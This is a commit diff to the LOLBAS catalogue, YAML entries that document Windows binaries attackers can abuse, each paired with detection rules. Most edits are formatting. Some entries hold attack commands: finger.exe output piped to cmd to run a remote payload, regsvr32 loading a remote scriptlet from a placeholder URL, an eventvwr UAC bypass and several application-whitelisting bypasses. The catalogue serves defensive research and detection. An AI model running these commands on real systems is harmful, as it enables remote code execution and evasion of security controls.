- Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/win_susp_vssadmin_ntds_activity.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/win_susp_esentutl_activity.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/bacb44ab972343358bae612e4625f8ba2e043573/rules/windows/process_creation/process_susp_esentutl_params.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_copying_sensitive_files_with_credential_data.yml
- Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/esentutl_sam_copy.yml
- Elastic: https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml
- Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/win_susp_vssadmin_ntds_activity.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/win_susp_esentutl_activity.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/bacb44ab972343358bae612e4625f8ba2e043573/rules/windows/process_creation/process_susp_esentutl_params.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_copying_sensitive_files_with_credential_data.yml
- Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/esentutl_sam_copy.yml
- Elastic: https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml
Resources:
- Link: https://twitter.com/egre55/status/985994639202283520
- Link: https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/
@ -66,5 +66,4 @@ Acknowledgement:
- Person: egre55
Handle: '@egre55'
- Person: Mike Cary
Handle: 'grayfold3d'
---
Handle: '@grayfold3d'

View File

@ -7,7 +7,7 @@ Commands:
- Command: eventvwr.exe
Description: During startup, eventvwr.exe checks the registry value HKCU\Software\Classes\mscfile\shell\open\command for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user.
Usecase: Execute a binary or script as a high-integrity process without a UAC prompt.
Category: UAC bypass
Category: UAC Bypass
Privileges: User
MitreID: T1548.002
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -31,4 +31,3 @@ Acknowledgement:
Handle: '@enigma0x3'
- Person: Matt Graeber
Handle: '@mattifestation'
---

View File

@ -29,10 +29,10 @@ Full_Path:
- Path: C:\Windows\System32\Expand.exe
- Path: C:\Windows\SysWOW64\Expand.exe
Code_Sample:
- Code:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/b25fbbea54014565fc4551f94c97c0d7550b1c04/rules/windows/process_creation/sysmon_expand_cabinet_files.yml
- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml
- Sigma: https://github.com/SigmaHQ/sigma/blob/b25fbbea54014565fc4551f94c97c0d7550b1c04/rules/windows/process_creation/sysmon_expand_cabinet_files.yml
- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml
Resources:
- Link: https://twitter.com/infosecn1nja/status/986628482858807297
- Link: https://twitter.com/Oddvarmoe/status/986709068759949319
@ -41,4 +41,3 @@ Acknowledgement:
Handle: '@infosecn1nja'
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---

View File

@ -37,4 +37,3 @@ Acknowledgement:
Handle: '@CyberRaiju'
- Person: Jimmy
Handle: '@bohops'
---

View File

@ -1,6 +1,6 @@
---
Name: Extexport.exe
Description:
Description: Load a DLL located in the c:\test folder with a specific name.
Author: 'Oddvar Moe'
Created: 2018-05-25
Commands:
@ -15,7 +15,7 @@ Full_Path:
- Path: C:\Program Files\Internet Explorer\Extexport.exe
- Path: C:\Program Files (x86)\Internet Explorer\Extexport.exe
Code_Sample:
- Code:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_extexport.yml
- IOC: Extexport.exe loads dll and is execute from other folder the original path
@ -24,4 +24,3 @@ Resources:
Acknowledgement:
- Person: Adam
Handle: '@hexacorn'
---

View File

@ -1,6 +1,6 @@
---
Name: Extrac32.exe
Description:
Description: Extract to ADS, copy or overwrite a file with Extrac32.exe
Author: 'Oddvar Moe'
Created: 2018-05-25
Commands:
@ -38,9 +38,9 @@ Full_Path:
Code_Sample:
- Code:
Detection:
- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml
- Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_extrac32.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_extrac32_ads.yml
- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml
- Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_extrac32.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_extrac32_ads.yml
Resources:
- Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
@ -54,4 +54,3 @@ Acknowledgement:
Handle: '@VakninHai'
- Person: Tamir Yehuda
Handle: '@tim8288'
---

View File

@ -1,6 +1,6 @@
---
Name: Findstr.exe
Description:
Description: Write to ADS, discover, or download files with Findstr.exe
Author: 'Oddvar Moe'
Created: 2018-05-25
Commands:
@ -36,13 +36,12 @@ Full_Path:
- Path: C:\Windows\System32\findstr.exe
- Path: C:\Windows\SysWOW64\findstr.exe
Code_Sample:
- Code:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_findstr.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_findstr.yml
Resources:
- Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Acknowledgement:
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---

View File

@ -1,31 +1,30 @@
---
Name: Finger.exe
Description: Displays information about a user or users on a specified remote computer that is running the Finger service or daemon
Author: Ruben Revuelta
Created: 2021-08-30
Commands:
- Command: finger user@example.host.com | more +2 | cmd
Description: 'Downloads payload from remote Finger server. This example connects to "example.host.com" asking for user "user"; the result could contain malicious shellcode which is executed by the cmd process.'
Usecase: Download malicious payload
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows 8.1, Windows 10, Windows 11, Windows Server 2008, Windows Server 2008R2, Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019, Windows Server 2022
Full_Path:
- Path: c:\windows\system32\finger.exe
- Path: c:\windows\syswow64\finger.exe
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_finger_usage.yml
- IOC: finger.exe should not be run on a normal workstation.
- IOC: finger.exe connecting to external resources.
Resources:
- Link: https://twitter.com/DissectMalware/status/997340270273409024
- Link: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11)
Acknowledgement:
- Person: Ruben Revuelta (MAPFRE CERT)
Handle: '@rubn_RB'
- Person: Jose A. Jimenez (MAPFRE CERT)
Handle: '@Ocelotty6669'
- Person: Malwrologist
Handle: '@DissectMalware'
---
---
Name: Finger.exe
Description: Displays information about a user or users on a specified remote computer that is running the Finger service or daemon
Author: Ruben Revuelta
Created: 2021-08-30
Commands:
- Command: finger user@example.host.com | more +2 | cmd
Description: 'Downloads payload from remote Finger server. This example connects to "example.host.com" asking for user "user"; the result could contain malicious shellcode which is executed by the cmd process.'
Usecase: Download malicious payload
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows 8.1, Windows 10, Windows 11, Windows Server 2008, Windows Server 2008R2, Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019, Windows Server 2022
Full_Path:
- Path: c:\windows\system32\finger.exe
- Path: c:\windows\syswow64\finger.exe
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_finger_usage.yml
- IOC: finger.exe should not be run on a normal workstation.
- IOC: finger.exe connecting to external resources.
Resources:
- Link: https://twitter.com/DissectMalware/status/997340270273409024
- Link: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11)
Acknowledgement:
- Person: Ruben Revuelta (MAPFRE CERT)
Handle: '@rubn_RB'
- Person: Jose A. Jimenez (MAPFRE CERT)
Handle: '@Ocelotty6669'
- Person: Malwrologist
Handle: '@DissectMalware'

View File

@ -25,4 +25,3 @@ Resources:
Acknowledgement:
- Person: Carlos Perez
Handle: '@Carlos_Perez'
---

View File

@ -22,9 +22,9 @@ Full_Path:
- Path: C:\Windows\System32\forfiles.exe
- Path: C:\Windows\SysWOW64\forfiles.exe
Code_Sample:
- Code:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_indirect_cmd.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_indirect_cmd.yml
Resources:
- Link: https://twitter.com/vector_sec/status/896049052642533376
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
@ -34,4 +34,3 @@ Acknowledgement:
Handle: '@vector_sec'
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---

View File

@ -22,10 +22,10 @@ Full_Path:
- Path: C:\Windows\System32\ftp.exe
- Path: C:\Windows\SysWOW64\ftp.exe
Code_Sample:
- Code:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_ftp.yml
- IOC: cmd /c as child process of ftp.exe
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_ftp.yml
- IOC: cmd /c as child process of ftp.exe
Resources:
- Link: https://twitter.com/0xAmit/status/1070063130636640256
- Link: https://medium.com/@0xamit/lets-talk-about-security-research-discoveries-and-proper-discussion-etiquette-on-twitter-10f9be6d1939
@ -37,5 +37,4 @@ Acknowledgement:
- Person: BennyHusted
Handle: ''
- Person: Amit Serper
Handle: '@0xAmit '
---
Handle: '@0xAmit'

View File

@ -176,4 +176,3 @@ Resources:
Acknowledgement:
- Person: Jesus Galvez
Handle:
---

View File

@ -32,4 +32,3 @@ Resources:
Acknowledgement:
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---

View File

@ -35,4 +35,3 @@ Resources:
Acknowledgement:
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---

View File

@ -20,4 +20,3 @@ Resources:
Acknowledgement:
- Person: Wade Hickey
Handle: '@notwhickey'
---

View File

@ -1,6 +1,6 @@
---
Name: Ie4uinit.exe
Description:
Description: Executes commands from a specially prepared ie4uinit.inf file.
Author: 'Oddvar Moe'
Created: 2018-05-25
Commands:
@ -27,4 +27,3 @@ Resources:
Acknowledgement:
- Person: Jimmy
Handle: '@bohops'
---

View File

@ -34,4 +34,3 @@ Resources:
Acknowledgement:
- Person: Casey Smith
Handle: '@subtee'
---

View File

@ -17,6 +17,7 @@ Commands:
Category: Compile
Privileges: User
MitreID: T1127
OperatingSystem: Windows 10,7
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe
@ -32,4 +33,3 @@ Acknowledgement:
Handle: '@VakninHai'
- Person: Lior Adar
Handle:
---

View File

@ -15,10 +15,10 @@ Full_Path:
- Path: C:\Windows\System32\Infdefaultinstall.exe
- Path: C:\Windows\SysWOW64\Infdefaultinstall.exe
Code_Sample:
- Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
- Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/85d47aeabc25bbd023284849f4466c1e00b855ce/rules/windows/process_creation/process_creation_infdefaultinstall.yml
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
- Sigma: https://github.com/SigmaHQ/sigma/blob/85d47aeabc25bbd023284849f4466c1e00b855ce/rules/windows/process_creation/process_creation_infdefaultinstall.yml
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
Resources:
- Link: https://twitter.com/KyleHanslovan/status/911997635455852544
- Link: https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/
@ -26,4 +26,3 @@ Resources:
Acknowledgement:
- Person: Kyle Hanslovan
Handle: '@kylehanslovan'
---

View File

@ -7,7 +7,7 @@ Commands:
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
Description: Execute the target .NET DLL or EXE.
Usecase: Use to execute code and bypass application whitelisting
Category: AWL bypass
Category: AWL Bypass
Privileges: User
MitreID: T1218.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -24,11 +24,11 @@ Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
Code_Sample:
- Code:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/a04fbe2a99f1dcbbfeb0ee4957ae4b06b0866254/rules/windows/process_creation/win_possible_applocker_bypass.yml
- Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_installutil_beacon.toml
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
- Sigma: https://github.com/SigmaHQ/sigma/blob/a04fbe2a99f1dcbbfeb0ee4957ae4b06b0866254/rules/windows/process_creation/win_possible_applocker_bypass.yml
- Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_installutil_beacon.toml
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
Resources:
- Link: https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/
- Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12
@ -39,4 +39,3 @@ Resources:
Acknowledgement:
- Person: Casey Smith
Handle: '@subtee'
---

View File

@ -34,4 +34,3 @@ Resources:
Acknowledgement:
- Person: Malwrologist
Handle: '@DissectMalware'
---

View File

@ -40,4 +40,3 @@ Resources:
Acknowledgement:
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---

View File

@ -36,4 +36,3 @@ Acknowledgement:
Handle: '@gN3mes1s'
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---

View File

@ -56,4 +56,3 @@ Acknowledgement:
Handle: '@FortyNorthSec'
- Person: Bank Security
Handle: '@Bank_Security'
---

View File

@ -22,10 +22,10 @@ Full_Path:
- Path: C:\Windows\System32\mmc.exe
- Path: C:\Windows\SysWOW64\mmc.exe
Code_Sample:
- Code:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_mmc_spawn_shell.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/b731c2059445eef53e37232a5f3634c3473aae0c/rules/windows/file_event/sysmon_uac_bypass_dotnet_profiler.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_mmc_spawn_shell.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/b731c2059445eef53e37232a5f3634c3473aae0c/rules/windows/file_event/sysmon_uac_bypass_dotnet_profiler.yml
Resources:
- Link: https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/
- Link: https://offsec.almond.consulting/UAC-bypass-dotnet.html
@ -34,4 +34,3 @@ Acknowledgement:
Handle: '@bohops'
- Person: clem
Handle: '@clavoillotte'
---

View File

@ -53,4 +53,3 @@ Acknowledgement:
Handle: ''
- Person: Cedric
Handle: '@th3c3dr1c'
---

View File

@ -7,7 +7,7 @@ Commands:
- Command: msbuild.exe pshell.xml
Description: Build and execute a C# project stored in the target XML file.
Usecase: Compile and run code
Category: AWL bypass
Category: AWL Bypass
Privileges: User
MitreID: T1127.001
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -60,7 +60,7 @@ Detection:
- Elastic: https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
- IOC: Msbuild.exe should not normally be executed on workstations
Resources:
- Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md
@ -77,4 +77,3 @@ Acknowledgement:
Handle: '@Cneelis'
- Person: Jimmy
Handle: '@bohops'
---

View File

@ -24,4 +24,3 @@ Resources:
Acknowledgement:
- Person: Pierre-Alexandre Braeken
Handle: '@pabraeken'
---

View File

@ -14,7 +14,7 @@ Commands:
- Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
Usecase: Execute code bypass Application whitelisting
Category: AWL bypass
Category: AWL Bypass
Privileges: User
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -33,4 +33,3 @@ Resources:
Acknowledgement:
- Person:
Handle:
---

View File

@ -69,4 +69,3 @@ Acknowledgement:
Handle: '@subtee'
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---

View File

@ -51,4 +51,3 @@ Acknowledgement:
Handle: '@netbiosX'
- Person: Philip Tsukerman
Handle: '@PhilipTsukerman'
---

View File

@ -34,4 +34,3 @@ Acknowledgement:
Handle:
- Person: 'Xabier Ugarte-Pedrero'
Handle:
---

View File

@ -36,4 +36,3 @@ Acknowledgement:
Handle: '@subtee'
- Person: Adam
Handle: '@Hexacorn'
---

View File

@ -19,4 +19,3 @@ Detection:
Acknowledgement:
- Person: Elliot Killick
Handle: '@elliotkillick'
---

View File

@ -21,4 +21,3 @@ Resources:
Acknowledgement:
- Person: Elliot Killick
Handle: '@elliotkillick'
---

View File

@ -38,4 +38,3 @@ Acknowledgement:
Handle: '@kylehanslovan'
- Person: Fab
Handle: '@0rbz_'
---

View File

@ -22,4 +22,3 @@ Resources:
Acknowledgement:
- Person: Pierre-Alexandre Braeken
Handle: '@pabraeken'
---

View File

@ -31,4 +31,3 @@ Resources:
Acknowledgement:
- Person: Derek Johnson
Handle: ''
---

View File

@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows 10,7
Full_Path:
- Path: C:\Windows\system32\pnputil.exe
Code_Sample:
Code_Sample:
- Code: https://github.com/LuxNoBulIshit/test.inf/blob/main/inf
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/a8a0d546f347febb0423aa920dbc10713cc1f92f/rules/windows/process_creation/process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml
@ -22,4 +22,3 @@ Acknowledgement:
Handle: '@LuxNoBulIshit'
- Person: Avihay eldad
Handle: '@aloneliassaf'
---

View File

@ -25,4 +25,3 @@ Resources:
Acknowledgement:
- Person: Casey Smith
Handle: '@subtee'
---

View File

@ -40,4 +40,3 @@ Resources:
Acknowledgement:
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---

View File

@ -28,4 +28,3 @@ Resources:
Acknowledgement:
- Person: Elliot Killick
Handle: '@elliotkillick'
---

View File

@ -25,4 +25,3 @@ Resources:
Acknowledgement:
- Person: Leon Rodenko
Handle: '@L3m0nada'
---

View File

@ -24,4 +24,3 @@ Resources:
Acknowledgement:
- Person: FireEye
Handle: '@FireEye'
---

View File

@ -41,4 +41,3 @@ Resources:
Acknowledgement:
- Person: Grzegorz Tworek
Handle: '@0gtweet'
---

View File

@ -36,4 +36,3 @@ Resources:
Acknowledgement:
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---

View File

@ -7,7 +7,7 @@ Commands:
- Command: regasm.exe AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the RegisterClass function.
Usecase: Execute code and bypass Application whitelisting
Category: AWL bypass
Category: AWL Bypass
Privileges: Local Admin
MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -38,4 +38,3 @@ Resources:
Acknowledgement:
- Person: Casey Smith
Handle: '@subtee'
---

View File

@ -32,4 +32,3 @@ Resources:
Acknowledgement:
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---

View File

@ -25,4 +25,3 @@ Resources:
Acknowledgement:
- Person: Eli Salem
Handle: '@elisalem9'
---

View File

@ -24,4 +24,3 @@ Resources:
Acknowledgement:
- Person: Philip Tsukerman
Handle: '@PhilipTsukerman'
---

View File

@ -14,7 +14,7 @@ Commands:
- Command: regsvcs.exe AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the RegisterClass function.
Usecase: Execute dll file and bypass Application whitelisting
Category: AWL bypass
Category: AWL Bypass
Privileges: Local Admin
MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -34,4 +34,3 @@ Resources:
Acknowledgement:
- Person: Casey Smith
Handle: '@subtee'
---

View File

@ -7,14 +7,14 @@ Commands:
- Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
Description: Execute the specified remote .SCT script with scrobj.dll.
Usecase: Execute code from remote scriptlet, bypass Application whitelisting
Category: AWL bypass
Category: AWL Bypass
Privileges: User
MitreID: T1218.010
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
Description: Execute the specified local .SCT script with scrobj.dll.
Usecase: Execute code from scriptlet, bypass Application whitelisting
Category: AWL bypass
Category: AWL Bypass
Privileges: User
MitreID: T1218.010
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -36,7 +36,7 @@ Full_Path:
- Path: C:\Windows\System32\regsvr32.exe
- Path: C:\Windows\SysWOW64\regsvr32.exe
Code_Sample:
- Code:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/6fbce11094285e5ba13fe101b9cb70f5b1ece198/rules/windows/process_creation/win_susp_regsvr32_anomalies.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/6d56e400d209daa77a7900d950a7c587dc0cd2e5/rules/windows/network_connection/sysmon_regsvr32_network_activity.yml
@ -57,4 +57,3 @@ Resources:
Acknowledgement:
- Person: Casey Smith
Handle: '@subtee'
---

View File

@ -32,4 +32,3 @@ Resources:
Acknowledgement:
- Person: elceef
Handle: '@elceef'
---

View File

@ -39,4 +39,3 @@ Acknowledgement:
Handle: '@splinter_code'
- Person: ap
Handle: '@decoder_it'
---

View File

@ -91,4 +91,3 @@ Acknowledgement:
Handle: '@404death'
- Person: Martin Ingesen
Handle: '@Mrtn9'
---

View File

@ -1,6 +1,6 @@
---
Name: Runonce.exe
Description:
Description: Executes a Run Once Task that has been configured in the registry
Author: 'Oddvar Moe'
Created: 2018-05-25
Commands:
@ -27,4 +27,3 @@ Resources:
Acknowledgement:
- Person: Pierre-Alexandre Braeken
Handle: '@pabraeken'
---

View File

@ -1,6 +1,6 @@
---
Name: Runscripthelper.exe
Description:
Description: Execute target PowerShell script
Author: 'Oddvar Moe'
Created: 2018-05-25
Commands:
@ -18,7 +18,7 @@ Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_runscripthelper.yml
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
- IOC: Event 4014 - Powershell logging
- IOC: Event 400
Resources:
@ -26,4 +26,3 @@ Resources:
Acknowledgement:
- Person: Matt Graeber
Handle: '@mattifestation'
---

View File

@ -36,4 +36,3 @@ Resources:
Acknowledgement:
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---

View File

@ -11,7 +11,7 @@ Commands:
Privileges: User
MitreID: T1053.005
OperatingSystem: Windows
- Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily
- Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily
Description: Create a scheduled task on a remote computer for persistence/lateral movement
Usecase: Create a remote task to run daily relative to the the time of creation
Category: Execute
@ -33,4 +33,3 @@ Resources:
Acknowledgement:
- Person:
Handle:
---

View File

@ -1,6 +1,6 @@
---
Name: Scriptrunner.exe
Description:
Description: Execute binary through proxy binary to evade defensive counter measures
Author: 'Oddvar Moe'
Created: 2018-05-25
Commands:
@ -33,4 +33,3 @@ Resources:
Acknowledgement:
- Person: Nick Tyrer
Handle: '@nicktyrer'
---

View File

@ -31,4 +31,3 @@ Acknowledgement:
Handle: '@hexacorn'
- Person: Elliot Killick
Handle: '@elliotkillick'
---

View File

@ -22,4 +22,3 @@ Resources:
Acknowledgement:
- Person: Eral4m
Handle: '@eral4m'
---

View File

@ -25,4 +25,3 @@ Resources:
Acknowledgement:
- Person: Nick Landers
Handle: '@monoxgas'
---

View File

@ -35,4 +35,3 @@ Acknowledgement:
Handle: '@oddvarmoe'
- Person: Maxime Nadeau
Handle: '@m_nad0'
---

View File

@ -37,4 +37,3 @@ Acknowledgement:
Handle: '@oulusoyum'
- Person: Matt Graeber
Handle: '@mattifestation'
---

View File

@ -22,13 +22,12 @@ Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe
Code_Sample:
- Code:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_visual_basic_compiler.yml
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_visual_basic_compiler.yml
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml
Acknowledgement:
- Person: Lior Adar
Handle:
- Person: Hai Vaknin(Lux)
Handle:
---

Some files were not shown because too many files have changed in this diff Show More